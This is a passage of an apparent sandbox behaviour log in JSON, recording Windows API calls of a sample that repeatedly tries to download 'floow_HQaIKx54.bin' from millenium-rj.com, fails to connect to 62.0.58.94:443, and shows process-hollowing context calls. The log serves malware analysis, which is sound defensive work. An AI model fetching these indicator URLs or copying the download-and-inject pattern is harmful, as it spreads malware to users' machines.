"name": "OutputBuffer", "value": "\\x02\\x00\\x291\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 1920 }, { "timestamp": "2025-02-27 23:36:58,941", "thread_id": "11160", "caller": "0x72dddb27", "parentcaller": "0x72ddd9e7", "category": "network", "api": "setsockopt", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1324" }, { "name": "level", "value": "0x00000006" }, { "name": "optname", "value": "0x00000001" }, { "name": "optval", "value": "\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 1921 }, { "timestamp": "2025-02-27 23:36:58,941", "thread_id": "11160", "caller": "0x71a3a7f4", "parentcaller": "0x76fff4f1", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x0000052c" }, { "name": "IoControlCode", "value": "0x000120bf", "pretty_value": "IOCTL_AFD_DEFER_ACCEPT" }, { "name": "InputBuffer", "value": "\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x17\\x00\\x00\\x98\\x01\\x00\\x00\\x00\\xab\\xf2,\\x04\\x01\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "" } ], "repeated": 0, "id": 1922 }, { "timestamp": "2025-02-27 23:36:58,941", "thread_id": "11160", "caller": "0x71a3a7f4", "parentcaller": "0x76fff4f1", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x0000052c" }, { "name": "IoControlCode", "value": "0x000120bf", "pretty_value": "IOCTL_AFD_DEFER_ACCEPT" }, { "name": "InputBuffer", "value": "\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00,\\x01\\x00\\x98\\x01\\x00\\x00\\x00P\\xf2,\\x04\\x08\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "" } ], "repeated": 0, "id": 1923 }, { "timestamp": "2025-02-27 23:36:58,941", "thread_id": "11160", "caller": "0x72dddba3", "parentcaller": "0x72ddd9e7", "category": "network", "api": "setsockopt", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1324" }, { "name": "level", "value": "0x0000ffff" }, { "name": "optname", "value": "0x00001002" }, { "name": "optval", "value": "\\x00\\x00\\x04\\x00" } ], "repeated": 0, "id": 1924 }, { "timestamp": "2025-02-27 23:36:58,941", "thread_id": "11160", "caller": "0x72ddd601", "parentcaller": "0x72ddd4d6", "category": "network", "api": "ConnectEx", "status": false, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1324" }, { "name": "SendBuffer", "value": "" }, { "name": "ip", "value": "62.0.58.94" }, { "name": "port", "value": "443" } ], "repeated": 0, "id": 1925 }, { "timestamp": "2025-02-27 23:37:00,956", "thread_id": "11160", "caller": "0x72dbaed3", "parentcaller": "0x76512043", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 3, "id": 1926 }, { "timestamp": "2025-02-27 23:37:00,956", "thread_id": "11160", "caller": "0x72de96b2", "parentcaller": "0x72d8ee02", "category": "network", "api": "closesocket", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1324" } ], "repeated": 0, "id": 1927 }, { "timestamp": "2025-02-27 23:37:00,956", "thread_id": "11160", "caller": "0x72e2c03a", "parentcaller": "0x72dda29d", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 7, "id": 1928 }, { "timestamp": "2025-02-27 23:37:00,956", "thread_id": "2840", "caller": "0x00566aea", "parentcaller": "0x00000000", "category": "network", "api": "InternetOpenUrlA", "status": false, "return": "0x00000000", "arguments": [ { "name": "ConnectionHandle", "value": "0x00cc00a8" }, { "name": "URL", "value": "https://millenium-rj.com/ozil/floow_HQaIKx54.bin" }, { "name": "Headers", "value": "" }, { "name": "Flags", "value": "0x84000100" } ], "repeated": 0, "id": 1929 }, { "timestamp": "2025-02-27 23:37:00,956", "thread_id": "2840", "caller": "0x00566e14", "parentcaller": "0x00000000", "category": "system", "api": "NtDelayExecution", "status": true, "return": "0x00000000", "arguments": [ { "name": "Milliseconds", "value": "1000" } ], "repeated": 0, "id": 1930 }, { "timestamp": "2025-02-27 23:37:01,972", "thread_id": "2840", "caller": "0x00566981", "parentcaller": "0x00000000", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 4, "id": 1931 }, { "timestamp": "2025-02-27 23:37:01,972", "thread_id": "2840", "caller": "0x00566981", "parentcaller": "0x00000000", "category": "network", "api": "InternetOpenA", "status": true, "return": "0x00cc00ac", "arguments": [ { "name": "Agent", "value": "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" }, { "name": "AccessType", "value": "0x00000000" }, { "name": "ProxyName", "value": "" }, { "name": "ProxyBypass", "value": "" }, { "name": "Flags", "value": "0x00000000" } ], "repeated": 0, "id": 1932 }, { "timestamp": "2025-02-27 23:37:01,972", "thread_id": "2840", "caller": "0x0056cf9e", "parentcaller": "0x00000000", "category": "threading", "api": "NtGetContextThread", "status": true, "return": "0x00000000", "arguments": [ { "name": "ThreadHandle", "value": "0xfffffffe" }, { "name": "HollowedInstructionPointer", "value": "0x00000000" }, { "name": "CurrentInstructionPointer", "value": "0x00000000" }, { "name": "ProcessId", "value": "3552" } ], "repeated": 0, "id": 1933 }, { "timestamp": "2025-02-27 23:37:01,972", "thread_id": "2840", "caller": "0x0056d45a", "parentcaller": "0x00000000", "category": "network", "api": "InternetSetOptionA", "status": true, "return": "0x00000001", "arguments": [ { "name": "InternetHandle", "value": "0x00cc00ac" }, { "name": "Option", "value": "0x00000002", "pretty_value": "INTERNET_OPTION_CONNECT_TIMEOUT" }, { "name": "Buffer", "value": "0x000007d0" } ], "repeated": 0, "id": 1934 }, { "timestamp": "2025-02-27 23:37:01,972", "thread_id": "11036", "caller": "0x764e2689", "parentcaller": "0x73cbcb7a", "category": "system", "api": "NtWaitForSingleObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000003ac" }, { "name": "Milliseconds", "value": "18446744073709551615" }, { "name": "Status", "value": "Infinite" } ], "repeated": 0, "id": 1935 }, { "timestamp": "2025-02-27 23:37:01,972", "thread_id": "11036", "caller": "0x77182676", "parentcaller": "0x77182010", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000520" } ], "repeated": 0, "id": 1936 }, { "timestamp": "2025-02-27 23:37:01,972", "thread_id": "11036", "caller": "0x77182676", "parentcaller": "0x77182010", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000510" } ], "repeated": 0, "id": 1937 }, { "timestamp": "2025-02-27 23:37:01,972", "thread_id": "2840", "caller": "0x00566aea", "parentcaller": "0x00000000", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 2, "id": 1938 }, { "timestamp": "2025-02-27 23:37:01,972", "thread_id": "11036", "caller": "0x764e254a", "parentcaller": "0x73d0512a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000052c" } ], "repeated": 0, "id": 1939 }, { "timestamp": "2025-02-27 23:37:01,972", "thread_id": "11036", "caller": "0x764e254a", "parentcaller": "0x73cc2629", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000528" } ], "repeated": 0, "id": 1940 }, { "timestamp": "2025-02-27 23:37:01,972", "thread_id": "11036", "caller": "0x764e254a", "parentcaller": "0x73d0517f", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000003ac" } ], "repeated": 0, "id": 1941 }, { "timestamp": "2025-02-27 23:37:01,972", "thread_id": "11036", "caller": "0x77182676", "parentcaller": "0x77186a76", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000524" } ], "repeated": 0, "id": 1942 }, { "timestamp": "2025-02-27 23:37:01,972", "thread_id": "11036", "caller": "0x72dd2ae3", "parentcaller": "0x72dcc4b5", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 25, "id": 1943 }, { "timestamp": "2025-02-27 23:37:01,972", "thread_id": "11036", "caller": "0x72ddda5c", "parentcaller": "0x72ddd9e7", "category": "network", "api": "WSASocketW", "status": true, "return": "0x00000524", "arguments": [ { "name": "af", "value": "2", "pretty_value": "AF_INET" }, { "name": "type", "value": "1", "pretty_value": "SOCK_STREAM" }, { "name": "protocol", "value": "6", "pretty_value": "IPPROTO_TCP" }, { "name": "socket", "value": "1316" } ], "repeated": 0, "id": 1944 }, { "timestamp": "2025-02-27 23:37:01,972", "thread_id": "11036", "caller": "0x75882066", "parentcaller": "0x72dde1bb", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000524" }, { "name": "HandleName", "value": "\\Device\\Afd" }, { "name": "FileInformationClass", "value": "41", "pretty_value": "FileIoStatusBlockRangeInformation" }, { "name": "FileInformation", "value": "\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 1945 }, { "timestamp": "2025-02-27 23:37:01,972", "thread_id": "11036", "caller": "0x771b79df", "parentcaller": "0x771b77f6", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000524" }, { "name": "HandleName", "value": "\\Device\\Afd" }, { "name": "FileInformationClass", "value": "30", "pretty_value": "FileCompletionInformation" }, { "name": "FileInformation", "value": "T\\x00\\x00\\x00P8q\\x00" } ], "repeated": 0, "id": 1946 }, { "timestamp": "2025-02-27 23:37:01,972", "thread_id": "11036", "caller": "0x72dddaeb", "parentcaller": "0x72ddd9e7", "category": "network", "api": "bind", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1316" }, { "name": "ip", "value": "0.0.0.0" }, { "name": "port", "value": "0" } ], "repeated": 0, "id": 1947 }, { "timestamp": "2025-02-27 23:37:01,972", "thread_id": "11036", "caller": "0x71a4bb1d", "parentcaller": "0x7700234d", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000524" }, { "name": "IoControlCode", "value": "0x0001202f", "pretty_value": "IOCTL_AFD_GET_SOCK_NAME" }, { "name": "InputBuffer", "value": "" }, { "name": "OutputBuffer", "value": "\\x02\\x00\\x294\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 1948 }, { "timestamp": "2025-02-27 23:37:01,972", "thread_id": "11036", "caller": "0x72dddb27", "parentcaller": "0x72ddd9e7", "category": "network", "api": "setsockopt", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1316" }, { "name": "level", "value": "0x00000006" }, { "name": "optname", "value": "0x00000001" }, { "name": "optval", "value": "\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 1949 }, { "timestamp": "2025-02-27 23:37:01,972", "thread_id": "11036", "caller": "0x71a3a7f4", "parentcaller": "0x76fff4f1", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000524" }, { "name": "IoControlCode", "value": "0x000120bf", "pretty_value": "IOCTL_AFD_DEFER_ACCEPT" }, { "name": "InputBuffer", "value": "\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x17\\x00\\x00\\x98\\x01\\x00\\x00\\x00\\xab\\xf2<\\x04\\x01\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "" } ], "repeated": 0, "id": 1950 }, { "timestamp": "2025-02-27 23:37:01,972", "thread_id": "11036", "caller": "0x71a3a7f4", "parentcaller": "0x76fff4f1", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000524" }, { "name": "IoControlCode", "value": "0x000120bf", "pretty_value": "IOCTL_AFD_DEFER_ACCEPT" }, { "name": "InputBuffer", "value": "\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00,\\x01\\x00\\x98\\x01\\x00\\x00\\x00P\\xf2<\\x04\\x08\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "" } ], "repeated": 0, "id": 1951 }, { "timestamp": "2025-02-27 23:37:01,972", "thread_id": "11036", "caller": "0x72dddba3", "parentcaller": "0x72ddd9e7", "category": "network", "api": "setsockopt", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1316" }, { "name": "level", "value": "0x0000ffff" }, { "name": "optname", "value": "0x00001002" }, { "name": "optval", "value": "\\x00\\x00\\x04\\x00" } ], "repeated": 0, "id": 1952 }, { "timestamp": "2025-02-27 23:37:01,972", "thread_id": "11036", "caller": "0x72ddd601", "parentcaller": "0x72ddd4d6", "category": "network", "api": "ConnectEx", "status": false, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1316" }, { "name": "SendBuffer", "value": "" }, { "name": "ip", "value": "62.0.58.94" }, { "name": "port", "value": "443" } ], "repeated": 0, "id": 1953 }, { "timestamp": "2025-02-27 23:37:04,019", "thread_id": "11160", "caller": "0x72dbaed3", "parentcaller": "0x76512043", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 3, "id": 1954 }, { "timestamp": "2025-02-27 23:37:04,019", "thread_id": "11160", "caller": "0x72de96b2", "parentcaller": "0x72d8ee02", "category": "network", "api": "closesocket", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1316" } ], "repeated": 0, "id": 1955 }, { "timestamp": "2025-02-27 23:37:04,019", "thread_id": "11160", "caller": "0x72e2c03a", "parentcaller": "0x72dda29d", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 5, "id": 1956 }, { "timestamp": "2025-02-27 23:37:04,019", "thread_id": "2840", "caller": "0x00566aea", "parentcaller": "0x00000000", "category": "network", "api": "InternetOpenUrlA", "status": false, "return": "0x00000000", "arguments": [ { "name": "ConnectionHandle", "value": "0x00cc00ac" }, { "name": "URL", "value": "https://millenium-rj.com/ozil/floow_HQaIKx54.bin" }, { "name": "Headers", "value": "" }, { "name": "Flags", "value": "0x84000100" } ], "repeated": 0, "id": 1957 }, { "timestamp": "2025-02-27 23:37:04,019", "thread_id": "2840", "caller": "0x00566e14", "parentcaller": "0x00000000", "category": "system", "api": "NtDelayExecution", "status": true, "return": "0x00000000", "arguments": [ { "name": "Milliseconds", "value": "1000" } ], "repeated": 0, "id": 1958 }, { "timestamp": "2025-02-27 23:37:04,019", "thread_id": "11160", "caller": "0x72dabc04", "parentcaller": "0x72dda29d", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 6, "id": 1959 }, { "timestamp": "2025-02-27 23:37:05,034", "thread_id": "2840", "caller": "0x00566981", "parentcaller": "0x00000000", "category": "network", "api": "InternetOpenA", "status": true, "return": "0x00cc00b0", "arguments": [ { "name": "Agent", "value": "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" }, { "name": "AccessType", "value": "0x00000000" }, { "name": "ProxyName", "value": "" }, { "name": "ProxyBypass", "value": "" }, { "name": "Flags", "value": "0x00000000" } ], "repeated": 0, "id": 1960 }, { "timestamp": "2025-02-27 23:37:05,034", "thread_id": "2840", "caller": "0x0056cf9e", "parentcaller": "0x00000000", "category": "threading", "api": "NtGetContextThread", "status": true, "return": "0x00000000", "arguments": [ { "name": "ThreadHandle", "value": "0xfffffffe" }, { "name": "HollowedInstructionPointer", "value": "0x00000000" }, { "name": "CurrentInstructionPointer", "value": "0x00000000" }, { "name": "ProcessId", "value": "3552" } ], "repeated": 0, "id": 1961 }, { "timestamp": "2025-02-27 23:37:05,034", "thread_id": "2840", "caller": "0x0056d45a", "parentcaller": "0x00000000", "category": "network", "api": "InternetSetOptionA", "status": true, "return": "0x00000001", "arguments": [ { "name": "InternetHandle", "value": "0x00cc00b0" }, { "name": "Option", "value": "0x00000002", "pretty_value": "INTERNET_OPTION_CONNECT_TIMEOUT" }, { "name": "Buffer", "value": "0x000007d0" } ], "repeated": 0, "id": 1962 }, { "timestamp": "2025-02-27 23:37:05,034", "thread_id": "11160", "caller": "0x72dabb71", "parentcaller": "0x72e00454", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 27, "id": 1963 }, { "timestamp": "2025-02-27 23:37:05,034", "thread_id": "11160", "caller": "0x72ddda5c", "parentcaller": "0x72ddd9e7", "category": "network", "api": "WSASocketW", "status": true, "return": "0x0000052c", "arguments": [ { "name": "af", "value": "2", "pretty_value": "AF_INET" }, { "name": "type", "value": "1", "pretty_value": "SOCK_STREAM" }, { "name": "protocol", "value": "6", "pretty_value": "IPPROTO_TCP" }, { "name": "socket", "value": "1324" } ], "repeated": 0, "id": 1964 }, { "timestamp": "2025-02-27 23:37:05,034", "thread_id": "11160", "caller": "0x75882066", "parentcaller": "0x72dde1bb", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x0000052c" }, { "name": "HandleName", "value": "\\Device\\Afd" }, { "name": "FileInformationClass", "value": "41", "pretty_value": "FileIoStatusBlockRangeInformation" }, { "name": "FileInformation", "value": "\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 1965 }, { "timestamp": "2025-02-27 23:37:05,034", "thread_id": "11160", "caller": "0x771b79df", "parentcaller": "0x771b77f6", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x0000052c" }, { "name": "HandleName", "value": "\\Device\\Afd" }, { "name": "FileInformationClass", "value": "30", "pretty_value": "FileCompletionInformation" }, { "name": "FileInformation", "value": "T\\x00\\x00\\x00\\x98\\xa7t\\x00" } ], "repeated": 0, "id": 1966 }, { "timestamp": "2025-02-27 23:37:05,034", "thread_id": "11160", "caller": "0x72dddaeb", "parentcaller": "0x72ddd9e7", "category": "network", "api": "bind", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1324" }, { "name": "ip", "value": "0.0.0.0" }, { "name": "port", "value": "0" } ], "repeated": 0, "id": 1967 }, { "timestamp": "2025-02-27 23:37:05,034", "thread_id": "11160", "caller": "0x71a4bb1d", "parentcaller": "0x7700234d", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x0000052c" }, { "name": "IoControlCode", "value": "0x0001202f", "pretty_value": "IOCTL_AFD_GET_SOCK_NAME" }, { "name": "InputBuffer", "value": "" }, { "name": "OutputBuffer", "value": "\\x02\\x00\\x295\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 1968 }, { "timestamp": "2025-02-27 23:37:05,034", "thread_id": "11160", "caller": "0x72dddb27", "parentcaller": "0x72ddd9e7", "category": "network", "api": "setsockopt", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1324" }, { "name": "level", "value": "0x00000006" }, { "name": "optname", "value": "0x00000001" }, { "name": "optval", "value": "\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 1969 }, { "timestamp": "2025-02-27 23:37:05,034", "thread_id": "11160", "caller": "0x71a3a7f4", "parentcaller": "0x76fff4f1", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x0000052c" }, { "name": "IoControlCode", "value": "0x000120bf", "pretty_value": "IOCTL_AFD_DEFER_ACCEPT" }, { "name": "InputBuffer", "value": "\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x17\\x00\\x00\\x98\\x01\\x00\\x00\\x00\\xab\\xf2,\\x04\\x01\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "" } ], "repeated": 0, "id": 1970 }, { "timestamp": "2025-02-27 23:37:05,034", "thread_id": "11160", "caller": "0x71a3a7f4", "parentcaller": "0x76fff4f1", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x0000052c" }, { "name": "IoControlCode", "value": "0x000120bf", "pretty_value": "IOCTL_AFD_DEFER_ACCEPT" }, { "name": "InputBuffer", "value": "\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00,\\x01\\x00\\x98\\x01\\x00\\x00\\x00P\\xf2,\\x04\\x08\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "" } ], "repeated": 0, "id": 1971 }, { "timestamp": "2025-02-27 23:37:05,034", "thread_id": "11160", "caller": "0x72dddba3", "parentcaller": "0x72ddd9e7", "category": "network", "api": "setsockopt", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1324" }, { "name": "level", "value": "0x0000ffff" }, { "name": "optname", "value": "0x00001002" }, { "name": "optval", "value": "\\x00\\x00\\x04\\x00" } ], "repeated": 0, "id": 1972 }, { "timestamp": "2025-02-27 23:37:05,034", "thread_id": "11160", "caller": "0x72ddd601", "parentcaller": "0x72ddd4d6", "category": "network", "api": "ConnectEx", "status": false, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1324" }, { "name": "SendBuffer", "value": "" }, { "name": "ip", "value": "62.0.58.94" }, { "name": "port", "value": "443" } ], "repeated": 0, "id": 1973 }, { "timestamp": "2025-02-27 23:37:09,050", "thread_id": "11160", "caller": "0x72de96b2", "parentcaller": "0x72ec3a14", "category": "network", "api": "closesocket", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1324" } ], "repeated": 0, "id": 1974 }, { "timestamp": "2025-02-27 23:37:09,050", "thread_id": "11036", "caller": "0x72e59ac9", "parentcaller": "0x72ddc292", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 6, "id": 1975 }, { "timestamp": "2025-02-27 23:37:09,050", "thread_id": "2840", "caller": "0x00566aea", "parentcaller": "0x00000000", "category": "network", "api": "InternetOpenUrlA", "status": false, "return": "0x00000000", "arguments": [ { "name": "ConnectionHandle", "value": "0x00cc00b0" }, { "name": "URL", "value": "https://millenium-rj.com/ozil/floow_HQaIKx54.bin" }, { "name": "Headers", "value": "" }, { "name": "Flags", "value": "0x84000100" } ], "repeated": 0, "id": 1976 }, { "timestamp": "2025-02-27 23:37:09,050", "thread_id": "2840", "caller": "0x00566e14", "parentcaller": "0x00000000", "category": "system", "api": "NtDelayExecution", "status": true, "return": "0x00000000", "arguments": [ { "name": "Milliseconds", "value": "1000" } ], "repeated": 0, "id": 1977 }, { "timestamp": "2025-02-27 23:37:09,050", "thread_id": "11036", "caller": "0x72dabc04", "parentcaller": "0x72dda29d", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 6, "id": 1978 }, { "timestamp": "2025-02-27 23:37:10,066", "thread_id": "2840", "caller": "0x00566981", "parentcaller": "0x00000000", "category": "network", "api": "InternetOpenA", "status": true, "return": "0x00cc00b4", "arguments": [ { "name": "Agent", "value": "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" }, { "name": "AccessType", "value": "0x00000000" }, { "name": "ProxyName", "value": "" }, { "name": "ProxyBypass", "value": "" }, { "name": "Flags", "value": "0x00000000" } ], "repeated": 0, "id": 1979 }, { "timestamp": "2025-02-27 23:37:10,066", "thread_id": "2840", "caller": "0x0056cf9e", "parentcaller": "0x00000000", "category": "threading", "api": "NtGetContextThread", "status": true, "return": "0x00000000", "arguments": [ { "name": "ThreadHandle", "value": "0xfffffffe" }, { "name": "HollowedInstructionPointer", "value": "0x00000000" }, { "name": "CurrentInstructionPointer", "value": "0x00000000" }, { "name": "ProcessId", "value": "3552" } ], "repeated": 0, "id": 1980 }, { "timestamp": "2025-02-27 23:37:10,066", "thread_id": "2840", "caller": "0x0056d45a", "parentcaller": "0x00000000", "category": "network", "api": "InternetSetOptionA", "status": true, "return": "0x00000001", "arguments": [ { "name": "InternetHandle", "value": "0x00cc00b4" }, { "name": "Option", "value": "0x00000002", "pretty_value": "INTERNET_OPTION_CONNECT_TIMEOUT" }, { "name": "Buffer", "value": "0x000007d0" } ], "repeated": 0, "id": 1981 }, { "timestamp": "2025-02-27 23:37:10,066", "thread_id": "11036", "caller": "0x72dabb71", "parentcaller": "0x72e00454", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 27, "id": 1982 }, { "timestamp": "2025-02-27 23:37:10,066", "thread_id": "11036", "caller": "0x72ddda5c", "parentcaller": "0x72ddd9e7", "category": "network", "api": "WSASocketW", "status": true, "return": "0x00000510", "arguments": [ { "name": "af", "value": "2", "pretty_value": "AF_INET" }, { "name": "type", "value": "1", "pretty_value": "SOCK_STREAM" }, { "name": "protocol", "value": "6", "pretty_value": "IPPROTO_TCP" }, { "name": "socket", "value": "1296" } ], "repeated": 0, "id": 1983 }, { "timestamp": "2025-02-27 23:37:10,066", "thread_id": "11036", "caller": "0x75882066", "parentcaller": "0x72dde1bb", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000510" }, { "name": "HandleName", "value": "\\Device\\Afd" }, { "name": "FileInformationClass", "value": "41", "pretty_value": "FileIoStatusBlockRangeInformation" }, { "name": "FileInformation", "value": "\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 1984 }, { "timestamp": "2025-02-27 23:37:10,066", "thread_id": "11036", "caller": "0x771b79df", "parentcaller": "0x771b77f6", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000510" }, { "name": "HandleName", "value": "\\Device\\Afd" }, { "name": "FileInformationClass", "value": "30", "pretty_value": "FileCompletionInformation" }, { "name": "FileInformation", "value": "T\\x00\\x00\\x00P8q\\x00" } ], "repeated": 0, "id": 1985 }, { "timestamp": "2025-02-27 23:37:10,066", "thread_id": "11036", "caller": "0x72dddaeb", "parentcaller": "0x72ddd9e7", "category": "network", "api": "bind", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1296" }, { "name": "ip", "value": "0.0.0.0" }, { "name": "port", "value": "0" } ], "repeated": 0, "id": 1986 }, { "timestamp": "2025-02-27 23:37:10,066", "thread_id": "11036", "caller": "0x71a4bb1d", "parentcaller": "0x7700234d", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000510" }, { "name": "IoControlCode", "value": "0x0001202f", "pretty_value": "IOCTL_AFD_GET_SOCK_NAME" }, { "name": "InputBuffer", "value": "" }, { "name": "OutputBuffer", "value": "\\x02\\x00\\x296\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 1987 }, { "timestamp": "2025-02-27 23:37:10,066", "thread_id": "11036", "caller": "0x72dddb27", "parentcaller": "0x72ddd9e7", "category": "network", "api": "setsockopt", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1296" }, { "name": "level", "value": "0x00000006" }, { "name": "optname", "value": "0x00000001" }, { "name": "optval", "value": "\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 1988 }, { "timestamp": "2025-02-27 23:37:10,066", "thread_id": "11036", "caller": "0x71a3a7f4", "parentcaller": "0x76fff4f1", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000510" }, { "name": "IoControlCode", "value": "0x000120bf", "pretty_value": "IOCTL_AFD_DEFER_ACCEPT" }, { "name": "InputBuffer", "value": "\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x17\\x00\\x00\\x98\\x01\\x00\\x00\\x00\\xab\\xf2<\\x04\\x01\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "" } ], "repeated": 0, "id": 1989 }, { "timestamp": "2025-02-27 23:37:10,066", "thread_id": "11036", "caller": "0x71a3a7f4", "parentcaller": "0x76fff4f1", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000510" }, { "name": "IoControlCode", "value": "0x000120bf", "pretty_value": "IOCTL_AFD_DEFER_ACCEPT" }, { "name": "InputBuffer", "value": "\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00,\\x01\\x00\\x98\\x01\\x00\\x00\\x00P\\xf2<\\x04\\x08\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "" } ], "repeated": 0, "id": 1990 }, { "timestamp": "2025-02-27 23:37:10,066", "thread_id": "11036", "caller": "0x72dddba3", "parentcaller": "0x72ddd9e7", "category": "network", "api": "setsockopt", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1296" }, { "name": "level", "value": "0x0000ffff" }, { "name": "optname", "value": "0x00001002" }, { "name": "optval", "value": "\\x00\\x00\\x04\\x00" } ], "repeated": 0, "id": 1991 }, { "timestamp": "2025-02-27 23:37:10,066", "thread_id": "11036", "caller": "0x72ddd601", "parentcaller": "0x72ddd4d6", "category": "network", "api": "ConnectEx", "status": false, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1296" }, { "name": "SendBuffer", "value": "" }, { "name": "ip", "value": 